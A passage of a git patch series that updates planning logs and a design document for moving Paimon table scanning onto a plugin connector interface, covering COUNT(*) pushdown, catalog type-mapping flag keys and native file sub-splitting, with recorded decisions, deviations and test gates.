high-conf,false-positive steelman 被否:原始 feature PR #57821/#59720、全 regression CREATE CATALOG(paimon/iceberg/hive/jdbc 皆点分)、legacy parity、同 SPI PR 迁移的 JDBC 连接器正确保点分 `JdbcConnectorProperties:66-67` 均证点分为 canonical)。**修(纯连接器、零 SPI/BE)**:`PaimonConnectorProperties` 两常量重指 canonical 点分键(binary 常量并改名 `ENABLE_MAPPING_VARBINARY` 对齐 CatalogProperty/JDBC/iceberg 约定,同修分隔符+token)+ 更新 `PaimonConnectorMetadata` 一处引用;`Options(mapBinaryToVarbinary,mapTimestampTz)` 顺序本就对、无逻辑改。**BE 一致性已核**:`PluginDrivenScanNode extends FileQueryScanNode` 不 override mapping getter → BE scan param 经继承的 `getEnableMappingVarbinary/Tz` 本就读点分键(`FileQueryScanNode:192-193,635-678`),故修连接器 FE 侧读后 FE 列型与 BE scan param 一致(修前两侧分歧)。**用户定 = paimon-only**(vs 一次修全 3 连接器)→ hive/iceberg 同根因登 [DV-030](./deviations-log.md) 跨连接器 follow-up(hive `enable_mapping_binary_as_string` 是误名非语义反转)。否决 fe-core 归一化器(blast 大/破 JDBC 已正确读点分/对 paimon 双重漂移不足)。守门:模块 234/0/0(1 CI-gated skip)、checkstyle 0、import-gate 净、fail-before bug-catcher 向红(期望 VARBINARY 实得 STRING)+guard 两态绿。真值闸=`test_paimon_catalog_{varbinary,timestamp_tz}.groovy`(CI-gated,enablePaimonTest=false+外部 fixture)。设计 [`P5-fix-MAPPING-FLAG-KEYS-design.md`](./tasks/designs/P5-fix-MAPPING-FLAG-KEYS-design.md) | 2026-06-11 | ✅ | @@ -65,7 +66,16 @@ ## 详细记录(时间倒序) -### D-031 — P4-T06e FIX-PRUNE-PUSHDOWN 新增 additive 6 参 planScan SPI overload 透传裁剪分区(DG-1) +### D-054 — `FIX-COUNT-PUSHDOWN`(#8 M-2)= 新增 default `planScan(countPushdown)` overload + 连接器 collapse-to-one + +- **日期**:2026-06-12 +- **状态**:✅ 生效 +- **关联**:[task-list #8](./task-list-P5-rereview2-fixes.md)、[设计](./tasks/designs/P5-fix-COUNT-PUSHDOWN-design.md)、[第二轮 review report](./reviews/P5-paimon-rereview2-2026-06-11.md)、[DV-032]、[01-spi-extensions-rfc.md §23 E15](./01-spi-extensions-rfc.md) +- **背景**:翻闸后 plugin-driven paimon `COUNT(*)` 结果正确但慢。recon(5-scout + 对抗 synthesizer `wf_1ce48c93-325`)逐链核实三半中只缺一半:① **emit 半已建全**——`PaimonScanRange.Builder.rowCount`→prop `paimon.row_count`→`populateRangeParams.setTableLevelRowCount`(else -1),与 legacy `PaimonScanNode:303-308` byte-一致,**无新 thrift / 无 BE 改**;② **COUNT 枚举已达 BE**——`PhysicalPlanTranslator:873` 在 `PluginDrivenScanNode` 设 `pushDownAggNoGroupingOp=COUNT`(Nereids 不排除 plugin),`FileScanNode.toThrift:90` 发出,BE 已在 count 模式;③ **信号+计算缺**(bug)——`DataSplit.mergedRowCount()` 是 paimon-SDK-only 须连接器算;COUNT 信号 `getPushDownAggNoGroupingOp()==COUNT` 只在 fe-core 节点、`PluginDrivenScanNode.getSplits` 从不读(grep 0)、不在任何 `planScan`/`ConnectorSession`/`ConnectorContext`/handle → 每 split 发 `table_level_row_count=-1` → BE 物化全 post-merge 行去 count(`file_scanner.cpp:1298-1326`)。 +- **决策**:(1) **fix-now**(vs defer)。(2) **count-split 形状 = 连接器 collapse-to-one**:连接器累加全 count-eligible split 的 `mergedRowCount` 入 `countSum`、留首个 split 为代表、循环后发**一** JNI count range 携 `countSum`;= legacy `<=10000` 路径(`singletonList(first)` + `assignCountToSplits([one], sum)` → 一 split 携全 total)普遍化。(3) **SPI 参数 = `boolean countPushdown`**(BE 只需 COUNT-vs-not;`TPushAggOp` 过度泛化、把 thrift 枚举拉进 SPI 签名)。(4) **作用域 = paimon-only**(default no-op overload)。修=3 文件:SPI `ConnectorScanPlanProvider` +1 default 7-arg `planScan(...,boolean countPushdown)` 委托 6-arg [E15];fe-core `PluginDrivenScanNode.getSplits` 读 agg-op 传入(无 post-loop 数学);连接器抽 `planScanInternal(...,countPushdown)`(4-arg 委托 false、7-arg 委托 flag)+ count 短路第一臂 + 纯静态 `isCountPushdownSplit` + `buildCountRange`。 +- **替代方案**:① **defer**(登 deviations)——用户选 fix-now。② **经 `ConnectorSession` 穿信号**(FIX-FORCE-JNI 先例,零 SPI 签名改)——**否决**:agg-op 是 per-query planner 输出非 SET-var,会成静默无类型通道(本项目反复踩的 handle-bypass/signal-not-threaded bug 类)。③ **full-parity fe-core trim**(连接器发 per-split、fe-core 按 numBackends trim+redistribute)——更多 fe-core 代码、把 count 语义耦进通用 `ConnectorScanRange`,否决。④ **per-split(不 collapse)**——最简但比 legacy 多 fragment,否决。⑤ **`TPushAggOp` / typed `ScanContext` 参数**——过度泛化,选 boolean。 +- **影响**:3 产线文件(SPI +1 default 方法、fe-core getSplits、连接器 planScan)+ 1 测文件。**API 不 +1**(仅新增 default,[D-009])。SPI 新面记 [E15](RFC §23)。perf 偏差 [DV-032](collapse-to-one 丢 legacy `>10000` 并行 split trim)。**跨连接器**:新 default overload 利好 hive/iceberg/maxcompute,但 paimon-only 实现(default no-op)→ 将来 full-adopter 各自 override 即可。守门见索引行。 + - **日期**:2026-06-08 - **状态**:✅ 生效 diff --git a/plan-doc/deviations-log.md b/plan-doc/deviations-log.md index 338287a9527155..426c331c50c94e 100644 --- a/plan-doc/deviations-log.md +++ b/plan-doc/deviations-log.md @@ -17,6 +17,7 @@ | 编号 | 偏差主题 | 原计划位置 | 日期 | 当前状态 | |---|---|---|---|---| +| DV-032 | P5-fix#8 FIX-COUNT-PUSHDOWN:**collapse-to-one 丢 legacy `>10000` 并行 count-split trim**(用户签字采 collapse-to-one,2026-06-12)。legacy `PaimonScanNode:484-495` 收齐 count-eligible split 后按 `pushDownCountSum` 分流——`>COUNT_WITH_PARALLEL_SPLITS(10000)` 时 trim 到 `parallelExecInstanceNum * numBackends` 个 split 并 `assignCountToSplits` 把 total 均摊(BE 每 split CountReader 再求和回 total);`<=10000` 则 `singletonList(first)` 收一 split 携全 total。连接器**始终 collapse-to-one**(无论 countSum 大小),因连接器无 `numBackends`/`parallelExecInstanceNum`(fe-core scan-node-only,`getSplits(int numBackends)` 才有)。**纯 perf 偏差、结果恒等**:单 CountReader 在一个 fragment emit `countSum` 个空行(无 IO)而非 N 个并行——对超大 count 不并行化 count-emit。CountReader 不读数据故影响小。**未采 full-parity**(连接器发 per-split + fe-core 按 numBackends trim+redistribute)以避免把 count 语义耦进通用 `ConnectorScanRange` + 多 fe-core 代码。跨连接器:hudi/iceberg full-adopter 若要 `>10000` 并行可后续在 fe-core 加 trim hook(与 [DV-028]/[DV-030]/[DV-031]「新连接器读法 vs fe-core 既有约定」类缝同批考量)。真值闸=live-e2e(超大 PK 表 `COUNT(*)` 仍正确、仅观察 fragment 并行度差异) | [task-list #8](./task-list-P5-rereview2-fixes.md) / [P5-fix-COUNT-PUSHDOWN 设计](./tasks/designs/P5-fix-COUNT-PUSHDOWN-design.md) / [D-054](./decisions-log.md) | 2026-06-12 | 🟢 已登记(perf-only,结果恒等;live-e2e 真值闸)| | DV-031 | P5-fix#6 FIX-KERBEROS-DOAS 两接受项:① **真 doAs 端到端 = live-Kerberos-e2e only**——M-8(filesystem/jdbc over Kerberized HDFS)+ M-11(Kerberos HMS read RPC)的 FE-unit 测只覆盖 **wiring**(M-8 断言 `getExecutionAuthenticator()` 返 `HadoopExecutionAuthenticator` 类型、不调 initializeCatalog;M-11 用 `RecordingConnectorContext.failAuth`/`authCount` 断言 read 经 `executeAuthenticated`),**无 paimon-kerberos regression 套件**(现有 `regression-test/.../kerberos/` 4 套仅 hive+iceberg、gated by `enableKerberosTest`)→ 真 KDC doAs 留给 live-e2e 门(翻闸前必验)。fail-safe:非 Kerberos 部署 no-op authenticator 与真 authenticator 行为一致(`ExecutionAuthenticator.execute`=`task.call()`)、无回归。② **跨连接器 follow-up**:read-vs-DDL doAs 缺口(M-11)+ 翻闸-authenticator-wiring 缺口(M-8,`initializeCatalog` 死代码)在 hudi/iceberg full-adopter **同样复发**(`cutover-fe-dispatch-gap` 姊妹);与 [DV-028](#4 CREATE-time-only 校验)/[DV-030](#5 mapping-flag 键)同属「新连接器读法/翻闸 vs fe-core 既有约定」类缝,将来可批量 close。**M-8 新增 fe-core `MetastoreProperties.initExecutionAuthenticator` hook 是 fe-core 内部扩展、非连接器 SPI**(`ConnectorContext`/`Connector` 表面未改)→ 01-spi-extensions-rfc.md 无须改 | [task-list #6](./task-list-P5-rereview2-fixes.md) / [P5-fix-KERBEROS-DOAS 设计](./tasks/designs/P5-fix-KERBEROS-DOAS-design.md) / [D-052](./decisions-log.md) / [D-053](./decisions-log.md) | 2026-06-11 | 🟢 已登记(live-e2e 真值闸 + 跨连接器 follow-up)| | DV-030 | P5-fix#5 FIX-MAPPING-FLAG-KEYS 跨连接器 follow-up(用户定本轮 paimon-only):**新 hive + iceberg 连接器同根因**——读**下划线** mapping-flag 键而 fe-core 只写/读/藏**点分** catalog 键(`CatalogProperty:50,52`),`PluginDrivenExternalCatalog.createConnectorFromProperties` 喂原始 catalog map、中间无点分→下划线归一化 → 用户在 CREATE CATALOG 开 `enable.mapping.varbinary`/`enable.mapping.timestamp_tz` 对 hive/iceberg 亦**静默失效**(BINARY→STRING、LTZ→DATETIMEV2)。**iceberg** = `enable_mapping_varbinary`/`enable_mapping_timestamp_tz`(`IcebergConnectorProperties:46,47`→`IcebergConnectorMetadata:151,154`),仅分隔符差、语义不反转。**hive** = `enable_mapping_binary_as_string`/`enable_mapping_timestamp_tz`(`HiveConnectorProperties:52,53`→`HiveConnectorMetadata:317,319`),binary 键既改分隔符又改 token,但 `binary_as_string` 是**误名非语义反转**(`HmsTypeMapping:90-93` true→VARBINARY,喂 `mapBinaryToVarbinary` 字段)。JDBC 是唯一正确的新连接器(点分)。legacy hive/iceberg 经 `getCatalog().getEnableMappingVarbinary()` 读点分(`HMSExternalTable:791`/`IcebergUtils:1083`)→ 翻闸回归。**用户签 [D-051] = 本轮只修 paimon**(保 commit surgical、单任务);**follow-up(close 时)**:hive+iceberg 两常量重指 canonical 点分键(hive `binary_as_string` token 复原为 `varbinary`,**勿**反转 boolean)+ 各加 dotted-key honor UT;与 paimon #5 同形修。scope 经验证 workflow `wf_a3626c54-0db`(g5 + synthesizer,静态 trace 未 live) | [task-list #5](./task-list-P5-rereview2-fixes.md) / [P5-fix-MAPPING-FLAG-KEYS 设计](./tasks/designs/P5-fix-MAPPING-FLAG-KEYS-design.md) / [D-051](./decisions-log.md) | 2026-06-11 | 🟡 待修(跨连接器 follow-up,用户定本轮 paimon-only)| | DV-028 | P5-fix#4 FIX-JDBC-DRIVER-URL:driver_url 安全校验**仅 CREATE CATALOG**(`PaimonConnector.preCreateValidation`→`ConnectorValidationContext.validateAndResolveDriverPath`),**FE-restart reload / ALTER CATALOG / scan-time 不复校**——与 legacy 分歧(legacy `getBackendPaimonOptions`→`JdbcResource.getFullDriverUrl` 每 scan 复校 format/whitelist/secure-path)。根因 = pre-existing **fe-core 架构缝**、非本 fix/非 paimon 专属:`CatalogFactory:164` replay(`isReplay=true`) 跳 `checkWhenCreating`→`preCreateValidation` 不跑;`PluginDrivenExternalCatalog.checkProperties`(ALTER 路) 只调 `validateProperties`(无 driver 校验)、不调 `preCreateValidation`;`getBackendPaimonOptions` 仅 resolve 不 validate(连接器 scan-time 只有 `ConnectorContext`、无 driver-path 校验 hook)。**与 JDBC 参考连接器 `JdbcDorisConnector` 完全 parity**(其亦 CREATE-time-only)。**用户定接受**([D-050]):默认配置 permissive(`secure_path="*"`/whitelist 空)无可绕,唯一暴露 = 硬化部署后**收紧** whitelist/secure-path 又**不重建** catalog。**复评/follow-up(跨连接器)**:若需 close,须 fe-core 改(ALTER 路 `checkProperties`→`preCreateValidation`,注意会触发 JDBC 连接器的 BE 连通测)+ scan-time 校验须新 `ConnectorContext` SPI hook——影响全 plugin 连接器、独立工单 | [task-list #4](./task-list-P5-rereview2-fixes.md) / [P5-fix-JDBC-DRIVER-URL 设计](./tasks/designs/P5-fix-JDBC-DRIVER-URL-design.md) / [D-050](./decisions-log.md) | 2026-06-11 | 🟢 已登记(CREATE-time parity,用户接受+跨连接器 follow-up)| @@ -53,6 +54,21 @@ ## 详细记录(时间倒序) +### DV-032 — P5-fix#8 FIX-COUNT-PUSHDOWN:collapse-to-one 丢 legacy `>10000` 并行 count-split trim(PERF-ONLY,用户签字) + +- **发现日期**:2026-06-12 +- **发现 session / agent**:#8 recon(5-scout + 对抗 synthesizer workflow `wf_1ce48c93-325`,legacy-parity lens),用户在 scope 决策中明确选 collapse-to-one。 +- **当前状态**:🟢 已登记(perf-only,结果恒等;live-e2e 真值闸) +- **原计划位置**:[P5-fix-COUNT-PUSHDOWN 设计](./tasks/designs/P5-fix-COUNT-PUSHDOWN-design.md) §Deviation +- **偏差描述**:legacy `PaimonScanNode:484-495` 收齐 count-eligible split 后按 `pushDownCountSum` 分流——`> COUNT_WITH_PARALLEL_SPLITS(10000)` 时 trim 到 `parallelExecInstanceNum * numBackends` 个 split 并 `assignCountToSplits` 把 total 均摊(BE 每 split 的 CountReader 再求和回 total);`<=10000` 则 `singletonList(first)` 收一 split 携全 total。连接器 `PaimonScanPlanProvider.planScanInternal` **始终 collapse-to-one**(无论 `countSum` 大小都只发一个 count range 携全 total),因连接器**无** `numBackends`/`parallelExecInstanceNum`——它们是 fe-core scan-node-only(`PluginDrivenScanNode.getSplits(int numBackends)` 才有,连接器 SPI `planScan` 无)。**附(cosmetic)**:legacy 还在 post-loop 调 `setPushDownCount(sum)` 让 EXPLAIN 显示 `pushdown agg=COUNT (N)`(`FileScanNode` 节点级、display-only);collapse-to-one **无 fe-core post-loop** 故 plugin 路 EXPLAIN 不显示该计数行。**纯展示差异**:count 经 per-range `table_level_row_count` 走另一条路达 BE(与 EXPLAIN 显示无关),结果与性能均不受影响。review 判为 non-blocking(adversarial workflow `wf_6ead7c2c-b58`,display-only、pre-existing override 模式)。 +- **为何可接受**:纯 perf 偏差、**结果恒等**——单 CountReader 在一个 fragment emit `countSum` 个空行(无 IO、不读数据文件)而非 N 个并行;只在超大 count 时不并行化 count-emit。对比 legacy 的并行 trim 本身也只是优化(CountReader 极廉)。**fail-safe**:collapse-to-one 是 legacy `<=10000` 路径的普遍化,非新行为。 +- **未采替代**:full-parity(连接器发 per-split + fe-core 按 numBackends trim+redistribute)——会把 count 语义耦进通用 `ConnectorScanRange`(fe-core 须读/改写各 range 的 row_count)、多 fe-core 代码、blast 大;per-split(不 collapse)——比 legacy 多 fragment。collapse-to-one 是连接器自包含、零 fe-core post-loop 数学的最简正确解。 +- **影响范围**:仅 count 查询的 split 并行度(fragment 数);count 结果与全表行数均正确。 +- **关联**:[D-054]、[第二轮 review report](./reviews/P5-paimon-rereview2-2026-06-11.md)(M-2)、[DV-028]/[DV-030]/[DV-031](同属「新连接器读法/翻闸 vs fe-core 既有约定」类缝) +- **后续动作**: + - [ ] **live e2e(必经)**:超大 PK 表 `COUNT(*)` 验结果正确;EXPLAIN/profile 观察 count fragment 并行度(与 legacy 差异为预期、非回归)。 + - [ ] 跨连接器:hudi/iceberg full-adopter 若需 `>10000` 并行 count-split,可在 fe-core 加通用 trim hook 批量 close(与 DV-028/030/031 同批考量)。 + ### DV-015 — P4-T06e FIX-PRUNE-PUSHDOWN:端到端裁剪下推 wiring 无 fe-core 单测(KNOWN-LIMITATION) - **发现日期**:2026-06-08 diff --git a/plan-doc/task-list-P5-rereview2-fixes.md b/plan-doc/task-list-P5-rereview2-fixes.md index 24e9e755d6cb1d..3b10e679ed4da0 100644 --- a/plan-doc/task-list-P5-rereview2-fixes.md +++ b/plan-doc/task-list-P5-rereview2-fixes.md @@ -30,7 +30,7 @@ | 5 | FIX-MAPPING-FLAG-KEYS | MAJOR | M-crit | dotted-vs-underscore type-mapping flag keys (wrong type) | no | ✅ | ✅ | ✅ 234/0/0 | ✅ `9dcf6d1a9e5` | | 6 | FIX-KERBEROS-DOAS | MAJOR | M-8 + M-11 | M-8: wire HDFS authenticator for fs/jdbc (fe-core); M-11: wrap ALL read RPCs in `executeAuthenticated` (connector, full legacy parity) | no³ | ✅ | ✅ | ✅ 248/0/0 + 21/0/0 | ✅ `2b1442fa57a` | | 7 | FIX-FORCE-JNI-SCANNER | MAJOR | M-1 | honor `force_jni_scanner` session var on connector scan | no | ✅ | ✅ | ✅ 250/0/0 | ✅ `05132a42668` | -| 8 | FIX-COUNT-PUSHDOWN | MAJOR* | M-2 | FE-computed `mergedRowCount` / `paimon.row_count` (perf) | maybe | ⬜ | ⬜ | ⬜ | ⬜ | +| 8 | FIX-COUNT-PUSHDOWN | MAJOR* | M-2 | FE-computed `mergedRowCount` / `paimon.row_count` (perf); SPI count-pushdown overload + fe-core forward + connector collapse-to-one | **yes** | ✅ | ✅ | ✅ 252/0/0 + fe-core | 🔄 pending | | 9 | FIX-NATIVE-SUBSPLIT | MAJOR* | M-3 | native ORC/Parquet sub-file splitting (parallelism) | maybe | ⬜ | ⬜ | ⬜ | ⬜ | `sev*` = round-2 rated MAJOR but round-1 rated **MINOR** (perf-only, correct results) — **user decides severity** (see §P2). @@ -106,9 +106,13 @@ Legend: ⬜ todo / 🔄 in progress / ✅ done > Both are correct-results, perf/parallelism-only. Recommend **accept-or-defer** unless perf parity is required for cutover. If deferring, log in `deviations-log.md`. ### 8. FIX-COUNT-PUSHDOWN — `COUNT(*)` pushdown not implemented (M-2) -- Connector never computes `mergedRowCount` / emits `paimon.row_count` → BE materializes merged rows to count (esp. costly on PK tables). `PaimonScanPlanProvider.java:186-296` vs `source/PaimonScanNode.java:396,421-429,483-495`. +- **✅ DONE** (commit pending; design [`P5-fix-COUNT-PUSHDOWN-design.md`](./tasks/designs/P5-fix-COUNT-PUSHDOWN-design.md), [D-054](./decisions-log.md), [DV-032](./deviations-log.md), [RFC §25 E15](./01-spi-extensions-rfc.md)). User signed off (2026-06-12): **proceed** + **connector collapse-to-one**. +- Recon (`wf_1ce48c93-325`) re-verified vs current code: the emit seam (`PaimonScanRange.Builder.rowCount`→`paimon.row_count`→`setTableLevelRowCount`) AND the COUNT enum→BE path are **already built**; only the **signal+compute** was missing → **NOT pure-connector** (corrected the initial framing). `dataSplit.mergedRowCount()` is SDK-only (connector); the `getPushDownAggNoGroupingOp()==COUNT` signal lives only on the fe-core node and reached nobody. +- **Fix (3 files):** SPI `ConnectorScanPlanProvider` +1 default 7-arg `planScan(...,boolean countPushdown)` (delegates to 6-arg; other connectors no-op) [E15]; fe-core `PluginDrivenScanNode.getSplits` reads the agg-op and forwards (no post-loop math); connector `PaimonScanPlanProvider` extracts `planScanInternal(...,countPushdown)` + count short-circuit first-arm + static `isCountPushdownSplit` + `buildCountRange` (**collapse-to-one**: sum eligible `mergedRowCount`, emit ONE JNI count range bearing the total = legacy's ≤10000 case). Param=`boolean`, paimon-only (engineering calls). legacy `>10000` parallel-split trim intentionally dropped → [DV-032]. +- **Gates:** connector 252/0/0 (1 CI-gated live skip), fe-core compile + checkstyle 0, import-gate clean, **fail-before exactly the 2 new tests red** (neuter `isCountPushdownSplit`→false), end-to-end real-local-PK-table test asserts collapse-to-one carrying the merged total (2). Real BE CountReader selection = CI-gated live-e2e (legacy paimon count regression covers the BE contract; no BE change). ### 9. FIX-NATIVE-SUBSPLIT — native sub-file splitting lost (M-3) +- **User signed off (2026-06-12): implement now.** ⬜ next. - One split per RawFile; large ORC/Parquet files get a single scanner. `PaimonScanPlanProvider.java:263-286` vs `source/PaimonScanNode.java:434-465` (`determineTargetFileSplitSize` + `fileSplitter.splitFile`). See also critic coverage-gap on split-count accounting (P3). --- diff --git a/plan-doc/tasks/designs/P5-fix-COUNT-PUSHDOWN-design.md b/plan-doc/tasks/designs/P5-fix-COUNT-PUSHDOWN-design.md new file mode 100644 index 00000000000000..8e387a4e8e3055 --- /dev/null +++ b/plan-doc/tasks/designs/P5-fix-COUNT-PUSHDOWN-design.md @@ -0,0 +1,99 @@ +# P5 fix #8 — `FIX-COUNT-PUSHDOWN` (M-2) + +> Round-2 severity MAJOR (round-1 MINOR), perf-parity. User signed off (2026-06-12): +> **Proceed** (SPI change accepted) + **connector collapse-to-one** for the count-split shape. +> Param shape `boolean countPushdown` and **paimon-only** scope decided as engineering calls +> (overridable, not overridden). + +## Problem +After cutover, `COUNT(*)` over a plugin-driven paimon table is **result-correct but slow**: BE is +already in COUNT mode (the `TPushAggOp.COUNT` enum reaches it via `FileScanNode.toThrift`), but the +connector never emits a precomputed row count, so every split carries `table_level_row_count = -1` +and BE falls back to **materializing the full post-merge row set just to count it** +(`file_scanner.cpp:1298-1326`). PK / merge-on-read tables pay the full merge + deletion-vector cost. + +## Root cause (verified against current code, recon `wf_1ce48c93-325`) +The fix has three independent halves; only one was missing: +1. **Emit half — ALREADY BUILT.** `PaimonScanRange.Builder.rowCount(long)` → prop `paimon.row_count` + → `populateRangeParams` → `formatDesc.setTableLevelRowCount(n)` (else `-1`). Byte-identical to + legacy `PaimonScanNode:303-308`. No new thrift, **no BE change**. +2. **COUNT enum → BE — ALREADY WORKS.** `PhysicalPlanTranslator:873` sets `pushDownAggNoGroupingOp` + on the `PluginDrivenScanNode` (it is NOT excluded — Nereids accepts any `LogicalFileScan`); + `FileScanNode.toThrift:90` ships it. BE is in COUNT mode. +3. **Signal + compute — MISSING (the bug).** + - The merged count `dataSplit.mergedRowCount()` is **Paimon-SDK-only** → must be connector-side. + - The COUNT **signal** `getPushDownAggNoGroupingOp()==COUNT` lives only on the fe-core node and is + **read by nobody** — `PluginDrivenScanNode.getSplits` never reads it (grep 0 hits) and it is not + in `planScan` / `ConnectorSession` / `ConnectorContext` / the handle. + +So this is **NOT pure-connector** (correcting the initial framing): the signal must cross the SPI +boundary. Threading it via `ConnectorSession` (the FIX-FORCE-JNI precedent) was **rejected** — the +agg-op is a per-query planner output, not a SET-variable; that would be a silent untyped channel. + +## Design (minimal, 3 files) +- **SPI** (`ConnectorScanPlanProvider`): add ONE new **default** `planScan` overload carrying + `boolean countPushdown`, mirroring the existing 4→5→6-arg delegation chain (`limit`, + `requiredPartitions` were added this exact way). Default delegates to the 6-arg → other connectors + (hive/iceberg/maxcompute) are untouched (no-op). +- **fe-core** (`PluginDrivenScanNode.getSplits`): read `getPushDownAggNoGroupingOp()==TPushAggOp.COUNT` + and pass it into the new overload. **No post-loop math** (the collapse lives in the connector). +- **connector** (`PaimonScanPlanProvider`): extract the existing 4-arg body into a private + `planScanInternal(..., boolean countPushdown)`; 4-arg delegates with `false`, the new 7-arg with + the flag. Add the count short-circuit: + - **collapse-to-one** (user's choice): accumulate `mergedRowCount()` of every count-eligible split + into `countSum`, keep the **first** eligible split as the representative, and after the loop emit + **one** JNI-serialized count range carrying `countSum` via `Builder.rowCount`. This == legacy's + `≤10000` path (`singletonList(first)` + `assignCountToSplits([one], sum)` → one split bearing the + full total), applied universally. + - Splits **without** a precomputed merged count fall through to the **normal native/JNI routing** + (unchanged) so BE still counts them from file metadata / by reading. + - Two new members: pure static `isCountPushdownSplit(boolean, DataSplit)` (the eligibility gate, + mirrors `shouldUseNativeReader`/`isForceJniScannerEnabled` precedent so the routing decision is + mutation-testable) and `buildCountRange(...)` (JNI range + `rowCount`, honors the cpp-reader flag). + +### Ordering (correctness-critical) +The count branch is the **first arm** of the per-split routing — count-eligible splits must NOT also +emit data ranges, or BE would re-scan and double-count against deletion vectors / PK merge. + +## Deviation from legacy (logged → `deviations-log.md`) +Legacy, for `countSum > 10000` (`COUNT_WITH_PARALLEL_SPLITS`), spreads the count over +`parallelExecInstanceNum * numBackends` splits for parallelism (`PaimonScanNode:485-491`). The +connector **always collapses to one** count split (it has no access to `numBackends`, an fe-core-only +concern). Perf-only divergence: a single CountReader emits `countSum` empty rows in one fragment +instead of N. CountReader does no IO, so impact is small; for very large counts the count-emit is not +parallelized. Result is identical. + +## Risk analysis +- **Result correctness:** unchanged — counts come from the SDK's post-merge `mergedRowCount()`; + mixed tables count each split exactly once (else-if/continue chain). The `-1` sentinel stays on all + non-count ranges. +- **cpp-reader serialization:** count range is JNI-serialized like `buildJniScanRange`, honoring the + `enable_paimon_cpp_reader` format (BE wraps any inner reader in CountReader regardless). +- **Other connectors:** default no-op overload → zero behavior change. +- **Batch path:** paimon does not opt into `supportsBatchScan`; only the synchronous `getSplits` + path runs, which is where the flag is threaded. + +## Test plan +Offline fail-before/pass-after IS drivable (the harness builds a REAL `DataSplit`, unlike the +schema-evolution/#7-SiteB cases): +- **Unit (connector, `PaimonScanPlanProviderTest`):** + 1. `isCountPushdownSplit(true, realSplit)==true` & `realSplit.mergedRowCount()==2`; `(false, ...)==false` + (pure-static eligibility gate; mutation = drop `countPushdown &&` / always-false → red). + 2. **End-to-end `planScan(...countPushdown=true)`** over a real local PK table (2 rows): exactly ONE + range carrying `paimon.row_count == "2"`; `countPushdown=false` → NO range carries `paimon.row_count`. + This is the gold fail-before (neuter the count branch → red). +- **fail-before verification:** neuter `isCountPushdownSplit`→false (and/or drop the count branch), + rerun → the two count tests red, the rest green; restore → all green. +- **live-e2e (CI-gated):** real BE CountReader selection / EXPLAIN `pushdown agg=COUNT (n)` — + existing legacy paimon count regression covers the BE contract (no BE change). + +## Files +- `fe/fe-connector/fe-connector-api/.../scan/ConnectorScanPlanProvider.java` — +1 default overload (**SPI change**). +- `fe/fe-core/.../datasource/PluginDrivenScanNode.java` — read agg-op + thread flag (+ `TPushAggOp` import). +- `fe/fe-connector/fe-connector-paimon/.../PaimonScanPlanProvider.java` — count branch + 2 helpers. +- `fe/fe-connector/fe-connector-paimon/.../PaimonScanPlanProviderTest.java` — count tests. + +## Log entries +- `decisions-log.md`: SPI signature change signed off; collapse-to-one; param=boolean; paimon-only. +- `deviations-log.md`: the `>10000` parallel-split-trim divergence (collapse-to-one). +- `01-spi-extensions-rfc.md`: note the count-pushdown overload joins the limit/requiredPartitions chain. From c948dac33e0b7f416240d1f4fa677ca3abb7af5b Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 12 Jun 2026 11:10:47 +0800 Subject: [PATCH 029/128] =?UTF-8?q?fix:=20FIX-NATIVE-SUBSPLIT=20=E2=80=94?= =?UTF-8?q?=20sub-split=20large=20native=20ORC/Parquet=20paimon=20files=20?= =?UTF-8?q?for=20read=20parallelism=20(M-3)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Root cause: after cutover, a large native (ORC/Parquet) paimon data file gets ONE scanner — no intra-file parallelism. The connector's native arm emitted exactly one PaimonScanRange per RawFile (start=0, length=file.length()). Legacy PaimonScanNode:434-465 sub-splits each large file via determineTargetFileSplitSize + fileSplitter.splitFile. Result is correct (BE reads the whole file either way); only read parallelism regresses. Recon (wf_ad764bf6-1c9) confirmed: it is a real gap (ORC/Parquet are PLAIN/splittable, legacy does sub-split); DV x sub-split is SAFE (paimon deletion-vector rowids are GLOBAL file row positions, BE native readers report global positions even within a partial byte range, _kv_cache shares the DV bitmap across sub-splits keyed by path+offset, iceberg uses the identical machinery on routinely-split files); and it is pure-connector (the splitter math + 5 session vars re-stated with plain longs — the connector cannot import fe-core FileSplitter/SessionVariable). Solution (pure connector, zero SPI, zero fe-core; D-055): - Two pure statics: computeFileSplitOffsets(fileLength, targetSplitSize) ports FileSplitter.splitFile's specified-size branch byte-for-byte incl. the >1.1D tail guard (the last range absorbs a remainder up to 1.1x instead of a tiny tail split); determineTargetSplitSize(...) ports determineTargetFileSplitSize + applyMaxFileSplitNumLimit (the isBatchMode->0 branch omitted — paimon is never batch). - sessionLong + lazy resolveTargetSplitSize read the 5 file-split session vars via the VariableMgr.toMap channel (like isCppReaderEnabled) and sum native-eligible file sizes once per scan. - Native arm: emit one range per [start,length) sub-range via buildNativeRanges, attaching the SAME unmodified per-RawFile DeletionFile to EVERY sub-range (DV is global-row-position indexed; no offset re-basing). buildNativeRange gains (start, length); fileSize stays the whole file length. - Under COUNT(*) pushdown a native split that is not count-eligible (no precomputed merged count, e.g. a DV with null cardinality) is kept WHOLE (target size 0 -> one whole-file range), mirroring legacy splittable=!applyCountPushdown. The split-weight/target-size scheduling nicety is not ported (pre-existing native path already omitted it; perf/scheduling-only, not correctness) -> DV-033. Tests: connector PaimonScanPlanProviderTest +6 — computeFileSplitOffsets math (250MB/64MB->4 with 58MB tail, exact-multiple, small-file-whole, empty, target<=0); determineTargetSplitSize heuristic (file_split_size override, 32MB<->64MB threshold, max_file_split_num floor); end-to-end append-only fixture (tiny file_split_size -> >=2 contiguous sub-ranges tiling [0,fileLength); default -> 1 range); DV on every sub-range; whole-file under count pushdown. Updated the 3 existing buildNativeRange call sites to the new signature. Connector 258/0/0 (1 CI-gated live skip), checkstyle 0, import-gate clean. Fail-before verified: neuter computeFileSplitOffsets -> the 3 splitting tests red; attach DV only to the first sub-range -> the DV test red. Real BE multi-range + DV read = CI-gated live-e2e (legacy paimon regression covers the BE contract; no BE change). Adversarially reviewed (workflow wf_4ac7479d-39d): 2 confirmed and fixed (the count-pushdown sub-split parity gap + false comment; the missing DV-on-every-sub-range test), 2 refuted. Co-Authored-By: Claude Opus 4.8 (1M context) --- .../paimon/PaimonScanPlanProvider.java | 165 +++++++++++++- .../paimon/PaimonScanPlanProviderTest.java | 214 +++++++++++++++++- plan-doc/decisions-log.md | 12 +- plan-doc/deviations-log.md | 15 ++ plan-doc/task-list-P5-rereview2-fixes.md | 13 +- .../designs/P5-fix-NATIVE-SUBSPLIT-design.md | 124 ++++++++++ 6 files changed, 528 insertions(+), 15 deletions(-) create mode 100644 